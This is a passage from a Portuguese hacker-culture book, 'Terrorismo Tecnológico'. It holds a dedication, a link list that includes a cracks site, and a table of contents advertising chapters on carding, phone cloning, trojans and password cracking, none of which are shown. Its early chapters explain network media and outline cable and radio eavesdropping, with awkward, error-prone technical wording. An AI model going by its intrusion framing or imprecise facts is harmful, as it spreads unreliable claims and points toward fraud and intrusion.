Você está na página 1de 475

http://www.leandro-t.cjb.

net/
leandro_t@terra.com.br
Um dia a máquina dominará o mundo. Não por que
ela será mais inteligente, mas dominará a
informação.
Os computadores serão os maiores conhecedores
do universo e terão todas as informações
existentes sobre a raça humana. Seus
pensamentos, suas teses, sua psicologia, seus
cálculos, sua ciência. A máquina então poderá
fazer com que o próprio homem se destrua, pois
ela lhe dará uma informação errada, e este homem
que crê na verdade da tecnologia acreditará
agirá erradamente e se auto-destruirá.
Se não existir softwares capazes de fazer estas
máquinas não serem um simples servidor de
arquivo será então o fim das máquinas. Sem o
homem que a programa e lhe dá o seu alimento que
é a informação, esta não terá mais motivo para
sua existência. Serão computadores inúteis, e
seres humanos incapazes de se defender.
Começará então o caus!
Dedicatória

Dedico este livro não só a meus familiares e


amigos, os quais estou obviamente agradecido.
Mas dedico a quem o ler, pois este não será mais
um medíocre que acreditará em toda a ilusão que
as empresas, engenheiros, especialistas nos
tentam fazer acreditar que seus sistemas são a
prova de invasões. Se houvesse tanta competência
e tanta segurança, ao abrirmos jornais todos os
dias não nos depararíamos com manchetes sobre
ataques, invasões, terrorismos, roubos
virtuais...
Acredito que a maior arma que possamos ter
contra estes problemas, é a informação! Quanto
mais soubermos, mais aprendermos e mais
discutirmos, aí sim vamos ter a capacidade de
compreender o tamanho do problema.
Confio na informática e acho que ela é a
solução de todos os nossos problemas, mas isso
se for usada corretamente.
Dedico então este livro a aqueles que nas aulas
tiravam notas baixas, dormiam em cima dos
livros, mas estavam conectados ao mundo real. E
em frente das longas madrugadas solitárias
faziam e fazem historia com seus computadores e
não são mais seres programados por uma sociedade
que não consegue enxergar a verdade.
Para o Leitor

Muitas das coisas deste livro foram coletadas


da Internet. Estas foram selecionadas e
melhoradas, mostradas de uma forma mais clara e
objetiva sem muita embolação. Mostro somente
aquilo que realmente funciona, e sendo assim são
coisas que devemos precaver ao montarmos uma
rede para que não nos ataquem!

Use este livro como um guia para o seu


planejamento de rede, como quem quer conhecer o
submundo dos hackers e para quem quer ter uma
segurança de rede, até por curiosidade este
livro o fará abrir sua cabeça.

Terei prazer em ter contato com leitores, meu


endereço é http://www.leandro-t.cjb.net/ ou
escreva para leandro_t@terra.com.br
Sites:

http://www.leandro-t.cjb.net/ Meu site!.... ;-)


www.cracks.am - Cracks
www.superdownloads.com.br - Download
www.downloads.com - Download
www.google.com.br - Maior e melhor site para pesquisas
www.meugrupo.com.br – grupos de discussão

Use seu micro para alguma Finalidade Científica uma boa idéia
é ajudar em pesquisas que buscam freqüências de radio em
outros planetas entre em http://setiathome.berkeley.edu e instale
o protetor de tela, ajudando assim a processar os dados obtidos
pelo satélite.

Alguns textos e tabelas foram baseados de outros autores. Esses


materiais foram colhidos na Internet.

Assuma seus próprios riscos, SEJA RESPONSAVEL!


Os Assuntos expostos aqui são para estudos e não para serem
usados contra alguém. Não me responsabilizo pelos seus atos!

Gostaria de agradecer a todos.


Muito obrigado
Índice

Parte I (Entendendo uma rede)

P1.1Entendendo as transmissões de rede...........17


P1.2Comunicações digitais................................17
P1.3 Interferência eletromagnética (EMI).........19
P1.4 Cabo de Fibra Ótica ..................................20
P1.5 Ondas de rádio...........................................22
P1.6 Escolhendo um Meio de Transmissão.......25
P1.7 Quão valioso são os meus dados?..............25
P1.8 Quais Segmentos Levam esses Dados?.....25
P1.9 Um Intruso será Notado?...........................26
P1.10 Onde está a Coluna Vertebral.................26
P1.11 Comunicações via Ethernet......................27
P1.12 Topologias de Circuito privadas..............30
P1.13 Hardware básicos.....................................30
P1.14 Repetidores...............................................31
P1.15 Hub...........................................................32
P1.16 Bridges.....................................................32
P1.17 Switches...................................................36
P1.18 VLAN Tecnologia...................................39
P1.19 Roteadores................................................40
P1.20 Protocolos de rede....................................40
P1.21 Extensões de arquivos..............................42
P1.22 Em qual país este site está hospedado?....45

Capítulo I (Introdução)

Parte I

1.1 Estamos totalmente seguros?..............................58


1.2 Quais os motivos que levam este invasor?.........59
1.3 Como é este Hacker?..........................................60
1.4 Sistema Seguro....................................................61
1.5 O administrador...................................................61
1.6 Mentiras? Imaginação?........................................62

Parte II

1.7 Os Invasores.........................................................63
1.7.1 – Lammer....................................................63
1.7.2 – Hackers....................................................63
1.7.3 – Cracker….................................................64
1.7.4 – Phreackers................................................64
1.7.5 – Funcionários.............................................65
1.7.6 – Terroristas.................................................66
1.7.7 – Carders......................................................66
1.8 Trapaceando para descobrir informações.............67

_________________________Extra
Vamos entender mais sobre protocolos?.....................69

Capítulo II (S.O.)

2.1 Windows X Unix...........................................74


2.2 Vantagens do UNIX......................................75
2.3 Configurações mal planejadas e erradas........76
2.4 Ataques restritos a um tipo de sistema...........77
2.5 O que é DNS, SMTP, SNMP?.............................75
2.5.1 O Que é DNS?.............................................75
2.5.2 O que é SMTP?...........................................77
2.5.3 O que é SNMP?...........................................79
2.6 Ataques Universais...............................................81

_____________________________Extra
Ataque por recusa de serviço......................................82
Capítulo III (Anônimidade)

3.1 Anônimidade........................................................84
3.2 Proxy....................................................................84
3.3 Usando o anonymizer..........................................86
3.4 Remailers.............................................................87
3.5 Lista de Proxy......................................................87

Capítulo IV (E-mails)

4.1 Encarando problemas com E-Mail.......................94


4.2 Spam.....................................................................94
4.3 E-Mail Bomba......................................................95
4.4 Remetente falso ou anônimo................................95
4.5 E-mails com arquivos auto executáveis................96
4.6 Alerta....................................................................96
4.7 Dicas.....................................................................98

Extra
Proxy...........................................................................98

1 - Porque um nível de aplicação Proxy?...................100


2 - Detalhes Técnicos.................................................102

Capítulo V (Carders e Phreackers)

5.1 Como Funciona.............................................107


5.2 Obtenção de cartões......................................107
5.3 Como Cardear...............................................108
5.4 Como cardear algo concreto.........................110
5.5 Phreacker (Telefonia)....................................111
5.6 Telefones Particulares..................................119
5.7 Telefones Celulares......................................123
5.8 Telefones Públicos.......................................126
5.9 Observações sobre clonagem........................132
Capítulo VI (vírus)

6.1 Vírus de macro.....................................................134


6.2 Vírus.....................................................................138
6.3 Exemplos de vírus................................................139
6.4 Entendendo mais sobre vírus................................141
6.5 Como funciona um programa antivírus................143
6.6 Badcom.................................................................143

Capítulo VII (Bomba DOS)

7.1 O que os hackers chamam de Bomba DOS?........154


7.2 Vejamos alguns comandos...................................154
7.3 Arquivo em Lote...................................................157

Capítulo VIII (Trojan)

8.1 Trojan...................................................................162
8.2 Invasão.................................................................163
8.3 Trojans de ponte...................................................165
8.4 Trojans comerciais................................................165
8.5 Camuflando...........................................................166
8.6 Usando o Net bus 2.10 como teste........................166
8.7 Manual NetBus.....................................................170
8.7.1 Introdução....................................................170
8.7.2 Comprometimento.......................................170
8.7.3 Detecção......................................................171
8.7.4 Removendo o NetBus..................................172
8.8 Manual Back Orifice.......................................173
8.8.1 O que é o Back Orifice?...............................173
8.8.2 Quem criou o Back Orifice?.........................173
8.8.3 Como ele funciona?......................................174
8.8.4 Quem...servidores...são os clientes?.............174
8. 8.5 Comandos....................................................175
8.8.6 O Manual...................................................180
8.9 Utilizando o Anti-Trojans...................................185
8.10 Remoção do trojan............................................186

Capítulo IX (Senhas)

9.1 Veja só!...............................................................190


9.2 Senhas dos brasileiros.........................................191
9.3 Senha - não usar..................................................191
9.4 Troca de senha....................................................192
9.5 Quebrando senhas...............................................192
9.6 Senhas padrão.....................................................193

Capítulo X (Pragas)

10.1 Spam – A praga no e-mail................................199


10.2 E-Mail Bomba..................................................199

Capítulo XI (IRC)

11.1 Introdução.........................................................202
11.2 Flood.................................................................202
11.3 Colisão de Nicks...............................................203
11.4 Tomando Canais...............................................204
11.5 Flood no Canal..................................................204
11.6 Netsplit..............................................................205
11.7 Pedindo ao OP..................................................206
11.8 Guerra Avançada..............................................206
11.9 Nuke…………………………………………..207
11.10 Bombas ICMP……………………………….207
11.11 Botnet/Floodnet……………………………...208

Capítulo XII (Sniffers)

12.1 Introdução.........................................................210
12.2 Filtrando pacotes na rede..................................211
12.3 Capturando senhas............................................212
12.4 Roteadores........................................................212
12.5 Anti-Sniffers.....................................................213

Capítulo XIII (Scanners)

13.1 Introdução.........................................................215
13.2 Descobrindo falhas em um host........................215
13.3 Portas abertas com serviços ativos....................216
13.4 Máquinas ativas da subnet.................................217
13.5 Scanneando o netbios........................................219
13.6 Como Evitar então?...........................................219
13.7 HTTP e FTP......................................................220
13.8 Analisando Firewalls.........................................220
13.9 Scan em Linux...................................................221

Capítulo XIV (FireWall)

14.1 Introdução.........................................................246
14.2 Podem funcionar da seguinte forma.................246
14.3 Evasão de Firewall............................................247
14.4 Como fazer?......................................................248
14.5 Então vamos lá:.................................................251
14.5.1 Vendo sites proibidos pelo nome...........251
14.5.2 Endereços WWW proibidos por nome......252
14.6 Como bloquear então?......................................252
14.7 Bom vamos mais a fundo!................................253
14.7.1 E se funcionar pela 6667?......................253
14.8 E no caso do FTP?............................................254
14.9 Para o Administrador........................................256

Capítulo XV (Registro do Windows)

15.1 O que é o registro do Sistema?.........................258


15.2 O que acontece ?...............................................258
15.3 E como ele sabe?..............................................258
15.4 Então.................................................................258
15.4.1 Hkey_Local_Machine……………...….259
15.4.2 Hkey_Current_Config………………....259
15.4.3 Hkey_Dyn_Data……………………….259
15.4.4 Hkey_Classes_Root……………………260
15.4.5 Hkey_Users…………………………….260
15.4.6 Hkey_Current_User……………………260
15.4.7 Hkey_Local_Machine\Config……….....260
15.4.8 Hkey_Local_Machine\Software…….….261
15.4.9 Hkey_Local_Machine\System….............261
15.5 Antes de começar faça um backup.....................262
15.5.1 Como fazer o BACKUP DO REGISTRO?....262
15.5.2 Como recuperar... REGISTRO...............262
15.6 Dicas:.................................................................265
15.7 Dicas de Windows.............................................275
15.7.1 Retirando a tela inicial (logo)................275
15.7.2 Fechando múltiplas janelas abertas.......276
15.7.3 Abrindo sub-folders..............................276
15.7.4 Apagando sem ir para lixeira.................276
15.7.5 Diretório de Startup...............................276
15.7.6 Explorer não mostra todos os arquivos..277
15.7.7 Explorer não mostra .............................277
15.7.8 Tocando CD automaticamente..............277
15.7.9 Arrastando objetos ................................277
15.7.10 Forçando copiar ou mover...................277
15.7.11 Copiando e movendo arquivos............278
15.7.12 Desligando o NumLock.......................278
15.7.13 Verifivando o tamanho de um folder...278
15.7.14 Modificando os logos do Win95..........279
15.7.15 Recortar,marcar e colar........................279
15.7.16 Acelere o Desempenho ........................279
15.7.17 Atualizando de 4 Mb para 8 Mb...........280
15.7.18 Delete Arquivos Imediatamente...........280
15.7.19 Desinstalando o Windows 95...............281
15.7.20Configurando o Autoplay......................281
15.7.21 Fechando várias pastas.........................281
15.7.22 Prompt em um diretório específico......281
15.7.23 Usando nomes longos..........................282
15.7.24 Reiniciando o Windows.......................282
15.7.25 Esvaziamento de Pilha.........................282
15.7.26 Botão Iniciar.........................................282
15.7.27 Propriedades.........................................283
15.7.28 Evitando reiniciar o computador..........283
15.7.29 Impressão Rápida.................................283
15.7.30 Renomeando a Lixeira..........................284
15.7.31 Teclas de Atalho...................................284
15.7.32 Ícone do MENU INICIAR...................288
15.7.33 Um menu iniciar ideal..........................289
15.7.34 Explorer no meu computador!..............289
15.7.35 Visualizar arquivos...............................290
15.7.36 Icones Meu Computador e Lixeira?.....290
15.7.37 As pessoas podem ler meu e-mail?.......291

Capítulo XVI (Bugs e Falhas)

16.1 Introdução.........................................................294
16.2 Como surge o bug.............................................294
16.3 Exemplos de falhas...........................................295
16.4 Buffer overflows...............................................296
16.5 Race condition..................................................296
16.6 Descobrindo se algum sistema têm falhas........296
16.7 Utilizando exploits ...........................................297
16.8 No Linux...........................................................297
16.9 Correção............................................................298
16.10 Outros Bugs.....................................................298

Capítulo XVII (Crackeando)

17.1 Wordlists...........................................................301
17.2 O processo de bruteforce..................................301
17.3 Tabela completa................................................302
17.4 Política de senhas não-crackeáveis...................335

Capítulo XVIII (Entendendo MS-DOS)


18.1 MS-DOS...........................................................337
18.2 Características do MS-DOS..............................337
18.3 Comandos Internos...........................................338
18.4 Comandos Externos..........................................339
18.5 Comandos de Inicialização...............................340
18.6 Arquivos em Lote.............................................340
18.7 Outros...............................................................341

Capítulo XIX (Unix)

19.1 Autenticação Fraca............................................344


19.2 IP Spoofing........................................................346
19.3 FTP (File Transfer Protocol).............................347
19.4 MAIL.................................................................348
19.5 Enteda mais sobre o kerberus............................349
19.6 Criptografia UNIX.............................................350
19.7 Protocolos interessates.......................................350
19.7.1 PGP..........................................................350
19.7.2 SSL...........................................................350
19.8 Ferramentas...Segurança no Unix.......................351
19.8.1 SATAN....................................................351
19.8.2 TIGER......................................................352
19.9 Telnet & Unix..................................................353

Capítulo XX (Dicas de Windows)

20.1 Desktops com Windows XP…….......................357


20.2 Desktops com Windows 2000............................358
20.3 Desktops com Windows NT 4.0.........................359
20.4 Desktops com Windows 9X, SE e ME...............361
20.5 Manutenção de segurança contínua....................361
20.6 Desktops com Office..........................................363
20.7 Servidores Exchange 2000.................................364
20.8 Mantendo o SQL Seguro....................................376
20.9 Servidores SQL Server 2000..............................378
20.10 Servidores SQL Server 7.0...............................381
20.11 Segurança do SQL Server 2000........................387
20.12 Segurança com o Win 2000 Server...................389
Capítulo XXI
LEIS – ESSAS QUE DEVERIAM VALER

22.1 Dos princípios que regulam a prestação de


serviço por redes de computadores...........................405
22.2 Do uso de informações disponíveis em
computadores ou redes de computadores.................405
22.3 dos crimes de informática.................................406
22.4 das disposições finais........................................410

Extras Uteis
Conectores................................................................413

Beeps.........................................................................430

Energia......................................................................438

Tabela ASCII............................................................442

Setup.........................................................................446
Terrorismo Tecnológico 16
Aprenda Para Sobreviver

Parte I

Entendendo uma rede

Parece complicado, mas não é, entender como funciona uma rede é


a arma mais fundamental para uma boa administração e um hacker que
domina a parte física com certeza terá uma grande vantagem em obter
resultados em conseguir informações, no outro lado está o
administrador que se possuir um bom conhecimento de protocolos,
cabeamento, ferramentas, hardwares e sistemas, poderá obter um
grande sucesso na prevenção anti-hacker.
Bons estudos!
Terrorismo Tecnológico 17
Aprenda Para Sobreviver

Você agora entenderá as propriedades de comunicação de


transmissões de rede. Verá as inseguranças existentes em redes
de comunicação e como pode desenvolver uma infra-estrutura de
rede que alivia algum destes problemas.

P1.1 Entendendo as transmissões de rede

A Agência de Segurança Nacional dos EUA que é a


responsável para fixar os padrões de encryptação para o governo
norte-americano e também é responsável para monitorar as
transmissões codificadas que são de interesse do governo. Para
saber como ficar seguro deve entender que as vulnerabilidades
existem e como estes problemas podem ser explorados.

Para poder projetar segurança em sua infra-estrutura de rede,


você tem que entender como os computadores fazem para se
comunicam entre si.

P1.2 Comunicações digitais

A comunicação digital é como se fosse feita por código Morse


ou um sistema de telégrafo, como eles são usados certos padrões
de pulsos para representar caráteres diferentes durante
transmissão. Se você examinar figura abaixo você verá um
exemplo de uma transmissão digital. Quando uma voltagem é
colocada no médio de transmissão, isto é considerado um binário
1. A ausência deste sinal é interpretada como um binário 0.
Terrorismo Tecnológico 18
Aprenda Para Sobreviver

Estas formas podem variar um pouco, pois tudo é feito


eletricamente com pulsos ou falta deles, mas ruídos podem
modificar um pouco essas “linhas” só que mesmo assim são
muitos bem reconhecíveis.

Este formato simples que permite que a comunicação digital


possa ser tão resistente a barulhos, mas essa também pode ser
sua maior desvantagem. A informação para que um caráter de
ASCII se forme são transmitida em uma única onda analógica ou
Terrorismo Tecnológico 19
Aprenda Para Sobreviver

vibração oito ondas separadas (ex: transmitir 01000001). Apesar


desta desvantagem inerente, esta comunicação digital é
normalmente muito mais eficiente do que circuitos analógicos que
requerem um cuidado bem maior para corrigir transmissões
ruidosas.

Quando você tem um circuito elétrico (como uma rede de


Ethernet que utiliza instalação elétrica de par trançado), você
precisa de um pulso para transmitir a informação. Isto significa que
o estado de voltagem constantemente está mudando o que
introduz sua primeira insegurança: interferência eletromagnética.

P1.3 Interferência eletromagnética (EMI)

O EMI é produzido por circuitos que usam um sinal revezado,


como comunicações analógicas ou digitais (chamado uma
corrente alternada ou um circuito de CA). EMI não é produzido por
circuitos que contêm um nível de poder consistente (chamado uma
corrente direta ou um circuito de DC).
Por exemplo, se você pudesse fatiar um dos fios que vêm de
uma bateria de carro e conseguisse ver os elétrons que passam
pelo fio, você veria um fluxo fixo de energia que passa pelo cabo
uniformemente constantemente. O nível de força nunca mudaria:
ficaria a 12 volts constantes. Uma bateria de carro é um exemplo
de um circuito de DC, porque a energia é nivelada e estável.
Agora, digamos você poderia cortar o fio de um abajur poderia
tentar a mesma experiência. Você veria agora que, dependendo
do tempo em que você medir a voltagem no fio, a medida seria em
qualquer lugar entre -120 volts e +120 volts. O nível de voltagem
do circuito estaria constantemente mudando.
O lado ruim para tudo isto é que a radiação eletromagnética
pode ser medida para "sentir" o sinal que viaja dentro do fio. Os
eletricistas tiveram ferramentas por muitos anos para este
propósito. A maioria dos eletricistas leva um dispositivo que eles
Terrorismo Tecnológico 20
Aprenda Para Sobreviver

simplesmente podem conectar ao redor de um arame para medir o


sinal que viaja pelo condutor de centro (MULTIMETRO).
Há dispositivos mais sofisticados que podem medir a radiação
de EMI que a partir de um cabo de rede podem registrar os pulsos
digitais que viajam dentro do fio. Uma vez que um registro destes
pulsos foi feito, é uma questão bem simples para converter de um
formato binário para um formato legível por nós.
Quando o cabo de par trançado ficou popular devido a seu
baixo custo, também se viu que ele é extremamente inseguro.
Considerando que o par trançado é usado para a transmissão de
sinais elétricos, EMI é produzido. E como o cabo não usa nenhum
tipo de protetor, ele se torna extremamente fácil de descobrir o
EMI que radia de cada condutor. Assim como o par trançado foi
uma escolha excelente para uso de rede geral, não foi uma
escolha muito boa se a informação que viaja ao longo dos cabos
nunca ele permanecerá 100 por cento seguro.
Assim seu primeiro ponto de vulnerabilidade são seus cabos de
rede atuais. Enquanto uma organização cresce e aumenta seus
computadores, vai haver uma teia de cabos passando por todos os
lados.
O problema redobrará se sua organização ficar situada em um
espaço de escritórios compartilhados, coisa muito comum em
cidades grandes e você terá cabos passando por áreas comuns.
Isto significa que um invasor que pretende roubar seus dados
nunca teria que ir perto de um servidor ou um quarto de cabos
para colecionar informação que estão trafegando. Um azulejo de
teto estourado, um buraco na parede é tudo aquilo que ele precisa
para criar um ponto de acesso a sua rede. Um invasor pode então
usar um transmissor de rádio até mesmo para retransmitir as
informações capturadas a um outro local. Isto significa o atacante
pode continuar colecionando informação para um período
estendido de tempo seguramente. Depois de instalado o circuito
ele ficara transmitindo os sinais.

P1.4 Cabo de Fibra Ótica


Terrorismo Tecnológico 21
Aprenda Para Sobreviver

Cabo de fibra ótica consiste em um vidro dentro de um cabo


cilíndrico de 62.5 mm de diâmetro, o “vidro” embrulhado reflete a
luz no condutor de espelhos. Isto tudo é encapsulado então em
uma jaqueta de fibra de KEVLAR dura.
A coisa inteira é colocada então em um tubo de PVC ou
Plenum. O diâmetro desta envoltura exterior é 125 mm. Enquanto
o vidro que reflete a luz for quebrável, a KEVLAR o mesmo que é
usado em coletes a prova de balas ficará protegendo a fiação.
A fibra usa uma fonte luminosa para transmissão de dados.
Esta fonte luminosa é tipicamente um diodo emitindo, isso produz
um sinal na gama infravermelha visível. No outro fim do cabo está
outro diodo que recebe os sinais. O tipo de transmissão clara pode
levar um de duas formas: único modo ou multímodo.

Perigo! Nunca olhe para a luz de uma fibra ativa! A


intensidade clara é forte o bastante para causar cegueira
permanente. Se você tem que inspecionar um cabo visualmente,
primeiro tenha certeza que está completamente desconectado da
rede. Só porque um cabo é escuro para um momento não significa
que está inativo.

Fibra de modo único consiste em enviar uma luz de um só tipo


isso produz uma única freqüência de luz. Esta única freqüência é
pulsada em um formato digital para transmitir dados de um lado do
cabo para o outro. O benefício da fibra de modo único em cima da
de multimodo é que ela é mais rápida e viajará distâncias mais
longas. A desvantagen é que o hardware é extremamente caro.
Transmissões de Multimodo consiste em freqüências de luz
múltiplas.

Dispersão clara:

Você verá dispersão clara se você uma lanterna contra uma


parede de perto: o padrão claro na parede terá um diâmetro maior
que a lente de lanterna. Se você une duas lanternas e os lustra
ambos contra a parede, você adquirirá uma área mesclada no
Terrorismo Tecnológico 22
Aprenda Para Sobreviver

meio onde é difícil determinar qual fonte luminosa é responsável


para qual porção da iluminação. Quanto mais distante da parede
que você move, maior esta área adquire. Isto é, em efeito, o que
os limites à distância em fibra de multimodo (quer dizer, se você
pode chamar 1.2 milhas uma limitação de distância). Como o
comprimento do cabo aumenta, fica mais difícil para o diodo no fim
receptor distinguir entre as freqüências claras diferentes.
Porque transmissões de multimodo são baseadas em luz em
vez de ser elétrico, a fibra se beneficia de ser completamente
imune a todos os tipos de EMI ser monitorado. Não há nenhuma
radiação para monitorar como umas passagens eletricidade no
condutor. Enquanto se pudesse ser possível cortar parte da
envoltura para chegar ao condutor de vidro, faria o sistema falhar.
O atacante seria então anulado, por que seus sistemas deixariam
de comunicar uma vez que a fibra estaria quebrada.
A fibra tem um outro benefício principal: é capaz de apoiar
conexões de largura da banda largas 10Mb, 100Mb, e GB e plano
o Ethernet é todo capaz de apoiar isto. Assim junto com melhorias
de segurança, há melhorias de desempenho. Isto é extremamente
útil justificando o uso de fibra permitindo satisfazer largura da
banda e preocupações de segurança. Se o Atacante for tentar
invadir a sua rede para monitorar transmissões, ele para irá
escolher um segmento de rede com muito tráfico de forma que
possa pegar uma quantia maior de dados. Coincidentemente,
estes também são os segmentos onde você usará cabos de fibra
ótica para apoiar a quantia grande de dados que fluem este ponto
entretanto na rede. Usando cabo de fibra ótica nestes segmentos,
você pode ajudar proteger a integridade de sua infra-estrutura de
cabos.

P1.5 Ondas de rádio

São usadas para transmitir em uma rede tipicamente de 1-


20GHz e são chamado sinais de microonda. Estes sinais podem
Terrorismo Tecnológico 23
Aprenda Para Sobreviver

serem fixados a sua freqüência ou espectro de expansão em


natureza.

Sinais de Freqüência fixos

Um sinal de freqüência fixo é uma única freqüência usada


como uma onda portadora para a informação que você deseja
transmitir. Uma estação de rádio é um exemplo bom de uma única
transmissão de freqüência. Quando você sintonizar à freqüência
de onda do portador de uma estação em seu radio de FM, você
pode ouvir o sinal que está montando.
Uma onda de portador é um sinal que é usado para levar outra
informação. Esta informação é sobreposta sobre o sinal (do
mesmo modo como barulho) e a onda resultante é transmitida na
atmosfera. Este sinal é recebido então por um dispositivo chamado
um demodulator (em efeito, seu rádio de carro é um demodulator
que pode ser fixado para freqüências diferentes) que remove o
sinal do portador e passa ao longo da informação restante. Uma
onda do portador é usada impulsionar o poder de um sinal e
estender a receptora do sinal.
Sinais de freqüência fixos são muito fáceis monitorar. Uma vez
um atacante sabe a freqüência do portador, ele tem todas as
informações que precisa Ele também tem toda a informação que
precisa para atrapalhar seu sinal, bloqueando todas as
transmissões que você está transmitindo.
Sinais não fixos:

Um sinal não fixo é idêntico a um sinal de freqüência fixo,


menos que as freqüências são transmitidas em forma múltiplas. A
razão que são transmitidas freqüências múltiplas é a redução de
interferência por barulho. Está tecnologia surgiu durante tempo de
guerra, quando um inimigo atrapalharia um sinal de freqüência fixo
transmitindo em uma freqüência idêntica.
Note que ainda é possível atrapalhar os sinais. Enquanto o
sinal variar por uma gama de freqüências, esta gama é
tipicamente um padrão repetido. Uma vez um atacante determina
Terrorismo Tecnológico 24
Aprenda Para Sobreviver

a cronometragem e o padrão da freqüência, ele está em uma


posição ver as transmissões em seu monitor.

É tão fácil de monitorar ou atrapalhar sinais de rádio, mas a


maioria das transmissões confia em encryptação para misturar o
sinal de forma que isto não pode ser monitorado através de
monitores externos.
Há dois métodos que podem ser usados para transmitir
freqüência fixa e sinais de espectro de expansão. Estes estão
chamado transmissões terrestres e de espaço.

Transmissões terrestres

Transmissões terrestres são sinais de rádio completamente por


terra.
As estações que estão enviando são tipicamente torres de
transmissão localizadas em cima de montanhas ou edifícios altos.
A gama destes sistemas normalmente é a linha de visão, embora
uma visão desobstruída não é requerida. Dependendo da força
notável, 50 milhas são sobre a gama o máximo usável em um
sistema de transmissão terrestre. A TELEVISÃO local e estações
de rádio são exemplos bons de indústrias que confiam em
radiodifusões terrestre. Os sinais delas só podem ser recebidos
localmente.

Transmissões pelo espaço

São sinais que originaram de um sistema de terra mas são


enviados por satélites que orbitam a terra na atmosfera superior. O
maior benefício de comunicações pelo espaço é gama. Podem ser
recebidos sinais de quase todo canto do mundo. Os satélites
podem ser afinados para aumentar ou diminuir a área de
radiodifusão efetiva.
Claro que, o maior a gama de radiodifusão de um sinal, o mais
suscetível é ser monitorado. Como os aumentos de gama
Terrorismo Tecnológico 25
Aprenda Para Sobreviver

notáveis, assim faz a possibilidade que alguém com bastantes


conhecimentos possa monitorar seus sinais se ele estiver dentro
de sua área de radiodifusão.

P1.6 Escolhendo um Meio de Transmissão

Você deveria considerar vários aspectos de seguranças ao


escolher um médio para transferir dados por sua rede.

P1.7 Quão valioso são os meus dados?

Se você mantém bancos de dados que contêm informação


financeira por exemplo nesse caso, alguém poderia roubar seu
dinheiro.

P1.8 Quais Segmentos de Rede Levam esses


Dados?

Suas redes levam informação sensível diariamente. Para


proteger estas informações, você precisa entender como o fluxo é
usado. Por exemplo, se você identificar as informações de
contabilidade de sua organização como sensível, você deveria
saber onde a informação é armazenada e quem tem acesso a isto.
Um workgroup pequeno com seu próprio servidor local estará mais
seguro que um banco de dados de contabilidade que pode ser
acessado remotamente usando algum médio de transmissão.

Pense: Tenha muito cuidado ao analisar os tipos de serviços


que estarão passando entre suas instalações. Por exemplo, e-mail
que é tipicamente alvo de pouca consideração, contudo
normalmente contém mais informação sobre sua organização do
Terrorismo Tecnológico 26
Aprenda Para Sobreviver

que qualquer outro serviço empresarial. Considerando que a


maioria das mensagens de passagem de sistemas de e-mail no
claro (se um atacante capturar este tráfico, se aparece como texto
claro), e-mail deveria ser um de seus serviços de rede com
melhores cuidados.

P1.9 Um Intruso será Notado?

É fácil perceber um intruso quando uma organização consiste


em três ou quatro pessoas. Imagine isto com três ou quatro mil
funcionarios, e a tarefa fica difícil proporcionalmente. Se você for o
administrador de rede, você pode ter nenhuma prática de
segurança físicas de sua organização. Porém, você pode se
esforçar para escutar sua rede.
Quando você usar um médio físico, lembre-se de que você
pode precisar tomar outras precauções de segurança.

P1.10 Onde está a Coluna Vertebral da sua rede?

Se um atacante que pretende monitorar sua rede, ele vai


procurar nos centrais onde ele pode pegar a maior parte das
informações. Armários de cabos e quartos de servidores são
objetivos principais por que estas áreas tendem a ser pontos de
junção para muitas sessões de comunicação. Ao dispor sua rede,
de uma atenção especial a estas áreas que considera perigoso e
use algo como cabo de fibra quando possível.
Considere estes assuntos cuidadosamente ao escolher um
método de transmissão para os dados. Use as informações de
análise de risco que para justificar suas escolhas. Enquanto
aumentar o nível de segurança da topologia puder parecer ser
uma coisa cara, o custo pode ser mais que justificado quando
comparou ao custo de recuperar de um intruso.
Terrorismo Tecnológico 27
Aprenda Para Sobreviver

Agora que você tem um entendimento bom das mídia de


transmissão disponíveis para levar seus dados, nós discutiremos
como estas mídia são configuradas para funcionar como uma
rede. Topologia está definida como as regras por conectar
fisicamente e comunicar em determinadas mídias de rede. Cada
topologia tem seu próprio jogo de regras para se conectar a seus
sistemas de rede.

P1.11 Comunicações via Ethernet

Agora nós examinaremos como a rede Ethernet que move as


informações de um sistema para outro por uma rede.
O Ethernet foi desenvolvido em 1970 pela Xérox e evoluiu
depois no IEEE adotou as especificações 802.3. Sua flexibilidade,
alta taxa de transmissão, fez rapidamente se tornar a topologia de
gestão de redes em ser a melhor escolha para muitos
administradores de rede.
É sem dúvida a topologia de gestão de redes mais popular. Sua
habilidade para apoiar uma extensa variedade de tipos de cabo,
hardware baratos, e connectividade fez se tornar usada em
empresas e até para usuários domesticos
As regras de comunicação de Ethernet são Portador de Acesso
Múltiplo de Senso com Descoberta de Colisão (CSMA/CD). Este
até parece complicado, mas é simples bastante para entender
quando você ver que:
- Os meios físicos de todas as estações da Ethernet têm que
escutar o fluxo dos cabos a toda hora (até mesmo ao transmitir).
Quando digo "escutar", eu quero dizer que a estação
constantemente deveriam estar monitorando a rede para ver se
qualquer outra estação esta enviando dados. Monitorando as
transmissões de outras estações, pode-se saber se uma estação
da rede esta aberta ou em uso. Deste modo, a estação não faz só
cegamente a transferência de informações e interferindo nas
outras estações. Também estando em um modo de escuta
Terrorismo Tecnológico 28
Aprenda Para Sobreviver

constante a estação estará pronta quando outra estação quiser


enviar dados.

- Acesso múltiplos são simplesmente meios em que mais de


dois computadores podem estar conectados na mesma rede, e
que todas as estações poderão transmitir dados, sempre em que a
rede estiver livre. É mais eficiente pois assim pode-se ter muitas
máquinas ligadas a um servidor e compartilhar recursos.

- O que acontece se dois sistemas pensarem que o circuito


esta livre e tentar transmitir dados ao mesmo tempo?

Quando duas estações transmitirem simultaneamente, uma


colisão acontecerá. Uma colisão é semelhante à interferência, e a
transmissão resultante é cortada e os dados ficaram inuteis. Como
uma estação que transmite os dados, fica olhando o meio de
transmissão; se ela descobrir essa tal uma condição, a estação de
trabalho assume que uma colisão aconteceu. A estação se
retirará, esperará por um período aleatório de tempo, e então
retransmitirá novamente.

- Note que cada estação é responsável para determinar seu


próprio período de espera aleatório antes da retransmissão. Isto
ajuda assegurar que cada estação está esperando por um período
diferente de tempo, evitando outra colisão. É um evento
improvável que uma segunda colisão aconteça mas se ocorrer (a
estação se retira se for novamente envolvida em uma colisão),
cada estação dobra o seu período de espera antes de tentar
novamente enviar os seus dados. Quando duas ou mais colisões
sucessivas acontecerem, são chamadas de uma colisão múltipla.

Ficaria mais ou menos assim:


Terrorismo Tecnológico 29
Aprenda Para Sobreviver

Fluxograma de regras de comunicação para Ethernet

Infelizmente, esta também é uma das falhas de segurança


maior da Ethernet. É possível configurar um sistema para ler todas
estas informações que a máquina está recebendo.
Na verdade isto serviria para que um administrador de rede
pudesse monitorar a rede de uma estação central de forma que
erros e estatísticas da rede fossem ser juntados. Um analisador de
rede é efetivamente um computador que opera em modo de
